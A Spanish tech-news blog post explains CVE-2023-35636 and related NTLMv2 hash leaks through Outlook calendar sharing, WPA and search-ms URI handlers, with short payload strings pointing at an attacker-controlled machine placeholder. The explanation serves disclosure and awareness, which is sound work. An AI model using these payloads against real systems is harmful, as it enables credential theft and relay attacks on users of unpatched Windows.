Tutoriales y Manuales
Entradas Mensuales
-
▼
2024
(Total:
1090
)
- ► septiembre (Total: 50 )
-
▼
enero
(Total:
124
)
- En Alemania buscan un administrador para MS-DOS y ...
- Meta presenta Code Llama 70B, un modelo open sourc...
- Opera prepara un navegador para iOS basado en inte...
- España participa en una operación mundial para des...
- Los usos curiosos que todavía damos a los disquete...
- Microsoft Edge «roba» datos personales de Chrome s...
- Elon Musk anuncia el primer humano con sus chips c...
- Amazon cancela la compra de iRobot Roomba
- Las imágenes de Taylor Swift que se hicieron viral...
- CPU funcional de 16 bits construida y ejecutada en...
- GoAccess: Analizador de Registros Web en Tiempo Real
- Buscador de Arc hace uso de la IA para crear una w...
- Los ‘deepfakes’ porno de Taylor Swift inundan X (T...
- OpenWrt tiene casi listas las especificaciones de ...
- Spotify acusa a Apple de extorsión por la nueva ta...
- El MIT anuncia una revolucionaria técnica de impre...
- AMD publica un driver para Linux que soporta sus d...
- Una vulnerabilidad en GRUB2 permitía omitir la ver...
- Explotación activa de vulnerabilidad en Atlassian ...
- Vulnerabilidad crítica en GoAnywhere
- Drainer-as-a-Service (DaaS) ¿qué son?
- Congreso Ciberseguridad Hackron XI - Tenerife 2024
- Guía Procesadores Intel Core i3, Core i5, Core i7 ...
- Microsoft despide a 1.900 empleados de Activision ...
- ¿Qué es una botnet? Conoce el control remoto de lo...
- Un nuevo bug en los teléfonos Google Pixel limita ...
- GrapheneOS: alternativa libre a Android
- Sam Altman estaría negociando con TSMC e inversion...
- La IA y la criptominería dispara el consumo de ene...
- Apple gana su primera batalla legal contra NSO Gro...
- Los horrores que viven los moderadores de Meta: “N...
- Ya disponible Parrot 6: la distribución de moda es...
- El delincuente que robó 700 mil € al Ayuntamiento ...
- Microsoft Copilot Pro: qué es, diferencias con la ...
- Google Chrome estrena funciones impulsadas por la ...
- HP asegura que bloquea los cartuchos de impresora ...
- Esta modelo gana 30K dólares al mes escuchando y h...
- Linux Lite o cómo devolver a la vida cualquier PC,...
- El FBI y CISA alertan sobre los posibles riesgos d...
- Función de seguridad "Aislamiento del núcleo" (Cor...
- La infraestructura de PyTorch fue comprometida
- Backups y Snapshots: diferencias y similitudes
- Así usan el reconocimiento facial con rostros por ...
- FraudGPT, BadGPT, WormGPT son dos modelos de ia qu...
- Francia multa con 32 millones a Amazon por el cont...
- La madre de todas las filtraciones: 12TB y 26 mil ...
- OpenWrt trabaja en un router inalámbrico
- Gestión gráfica de contenedores Docker con Portainer
- DDoSia Client: la herramienta del grupo pro-ruso N...
- La British Library, la biblioteca más completa del...
- Escape Room gratuito centrado en ciberseguridad: r...
- Vulnerabilidad en Microsoft Outlook permite extrac...
- Un chatbot de DPD insulta a un cliente
- Fallece David L. Mills: El legado del creador del ...
- Cryptomator: cifrado datos en la nube de Dropbox, ...
- Microsoft sufre un robo de correos corporativos po...
- Publican recopilación de 100 millones de contraseñ...
- Los resultados de un estudio sobre los datos que r...
- Desarrollan una batería nuclear capaz de durar 50 ...
- WebWormhole permite enviar archivos grandes sin in...
- Google Chrome soluciona el enésimo zero-day que es...
- Millones de GPU de Apple, AMD y Qualcomm están afe...
- Seagate presenta discos duros de más de 30TB
- Google Maps encuentra la solución para el mayor pr...
- Las profundidades de la privacidad digital: I2P, L...
- En españa un joven de 17 años es condenado por hac...
- En solo 5 minutos un desarrollador ha aumentado un...
- OpenAI prohíbe a políticos usar su inteligencia ar...
- Ubisoft sobre las suscripciones: "Los jugadores es...
- ¿Cuánto dinero perdería una empresa o un país en u...
- Desaparecen las licencias perpetuas de VMWare y se...
- Apple supera por primera vez a Samsung en ventas g...
- OpenAI autoriza el uso de sus sistemas de IA para ...
- Elon Musk muestra al humanoide de Tesla doblando l...
- Vulnerabilidad crítica en dispositivos de Juniper
- Una de las grandes mejoras del Galaxy S24 requiere...
- Explotación activa de vulnerabilidad Microsoft Sha...
- Google permitirá a los usuarios seleccionar qué se...
- Una empresa de etiquetado de IA contrata a trabaja...
- Una fuga de datos masiva afectaría a todos los ciu...
- Los ataques de ransomware provocan una muerte al m...
- El CEO de Twitch afirma que la plataforma de strea...
- NymConnect: App para mejorar la privacidad en Tele...
- Los medios Españoles empiezan a cobrar a los usuar...
- Descifrador gratuito para ransomware Black Basta y...
- unbound: servidor dns caché rápido y seguro con li...
- Piratas informáticos turcos hackean servidores MS ...
- China afirma haber crackeado el cifrado de Apple A...
- Un centro de salud deberá pagar una multa de más d...
- La nueva consola portátil: MSI Claw
- Mega 95, la consola portátil de Hyperkin que sopor...
- Intel presenta los Raptor Lake Refresh Mobile, nue...
- El Samsung Galaxy S24 se podrá usar como una webca...
- El Aeropuerto Internacional de Beirut, víctima de ...
- Carrefour sufre un ciberataque en Servicios Financ...
- Ransomware BlackHunt afecta a la compañía de telec...
- Alpine Linux: una Distro Linux pequeña, simple y s...
- Cómo configurar el entorno de red en Debian desde ...
- China lanzó un satélite que incluye un kernel Linu...
- El plan de Estados Unidos de regresar a la Luna 50...
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
iperf3 es la última versión del popular programa iperf para medir el ancho de banda entre dos o más equipos en red local o Internet . Es...
-
A finales del mes de agosto hablábamos de que los legisladores estadounidense habían solicitado la investigación de TP-Link . Y así, ya ten...
Vulnerabilidad en Microsoft Outlook permite extracción hashes contraseñas NTLM v2
Se ha identificado una nueva vulnerabilidad de Outlook que puede utilizarse para extraer hashes NTLMv2 explotando Outlook, Windows Performance Analyzer (WPA) y Windows File Explorer.
- Esta vulnerabilidad ha sido asignada con CVE-2023-35636, y la severidad ha sido dada como 6.5 (Media).
- Esta vulnerabilidad fue reportada a Microsoft en julio de 2023, y tomaron medidas parcheando el WPA y el Explorador de Archivos con "Severidad Moderada".
Microsoft ha parcheado completamente esta vulnerabilidad en diciembre de 2023. Sin embargo, los sistemas no parcheados siguen siendo vulnerables a la explotación y el robo de contraseñas cifradas.
Fallo de Outlook - CVE-2023-35636
Esta vulnerabilidad es un exploit de la función de compartir calendario en Outlook, que, si se añaden dos cabeceras adicionales, puede resultar en dirigir Outlook para conectarse y compartir contenido a una máquina externa. Esta conectividad puede ser utilizada para interceptar el hash NTLMv2.
Supongamos que un atacante consigue extraer los hashes de NTLM v3. En ese caso, hay dos posibles métodos de ataque, que son los ataques de fuerza bruta sin conexión, que pueden revelar la contraseña original, y los ataques de retransmisión de autenticación, en los que una solicitud de autenticación a un servidor puede ser manipulada por el atacante con el hash NTLMv2 y conseguir autenticarse en el servidor bajo el nombre de la víctima.
Filtración de hashes NTLM v2 utilizando Outlook
Outlook es la herramienta de correo electrónico y calendario de la suite Microsoft 365, utilizada por millones de personas y organizaciones en todo el mundo.
Una de sus características principales es el uso compartido de calendarios entre usuarios, que puede ser explotado para desencadenar un intento de autenticación que puede resultar en la redirección de la contraseña con hash al servidor del atacante.
Las cabeceras que pueden utilizarse para la explotación son,
- "Content-Class" = "Sharing" - indica a Outlook que este correo electrónico contiene contenido para compartir.
- "x-sharing-config-url" = \(máquina del atacante)\a.ics - dirige el Outlook de la víctima a la máquina del atacante.
Filtrando Hashes NTLM v2 usando URI Handlers
Windows Performance Analyzer (WPA), la característica por defecto en Windows, realiza una acción para instalar un manejador URI para WPA:// por defecto, que permite al programa lanzarse automáticamente cuando un usuario hace clic en un enlace relacionado con WPA.
Además, esta función utiliza hashes NTLM v2 para la autenticación a través de la web abierta. Esto hace que sea vulnerable a ataques de fuerza bruta de retransmisión y fuera de línea.
Para explotar esta WPA, el actor de la amenaza puede enviar una carga útil que tendrá tres partes.
Carga útil completa:
wpa:////<IP del atacante>/bla
wpa:// - indica al sistema operativo que este enlace debe abrirse en WPA.
//<IP del atacante> - indica a la máquina de la víctima que acceda a la máquina del atacante a través de SMB.
/bla - indica a la máquina de la víctima a qué archivo debe acceder.
Filtrando Hashes NTLM v2 usando el Explorador de Archivos de Windows
Existe un handle URI "search-ms" que activa la función de búsqueda del explorer.exe y apunta al proceso explorer.exe a la web. Este explorer.exe es uno de los procesos más potentes del sistema operativo Windows, que tiene varias capacidades para explorar archivos y carpetas, copiar y mover archivos, y crear y eliminar carpetas.
Sin embargo, como parte de la explotación, había dos parámetros identificados como parte de la documentación de Microsoft: "subquery" y "crumb". Para la explotación con el parámetro "subquery", se puede utilizar el siguiente payload
- search-ms://query=poc&subquery=\(Máquina atacante)\poc.search-ms
- search-ms:// - indica al sistema operativo que este enlace debe abrirse en exe.
- query=poc - Consulta de búsqueda falsa
- &subquery=\(Máquina atacante)\poc.search-ms - Ruta al archivo .search-ms.
Para la explotación con el parámetro "crumb", se puede utilizar la siguiente carga útil,
search-ms://query=poc&crumb=location:\\(Máquina atacante)
- search-ms:// - indica al sistema operativo que este enlace debe abrirse en exe.
- query=poc - Consulta de búsqueda falsa
- crumb=location:\\\(Máquina atacante) - La propiedad location bajo el parámetro crumb permite al usuario especificar una ruta para la búsqueda.
Fuentes:
https://gbhackers.com/outlook-flaw-hashed-passwords/
https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.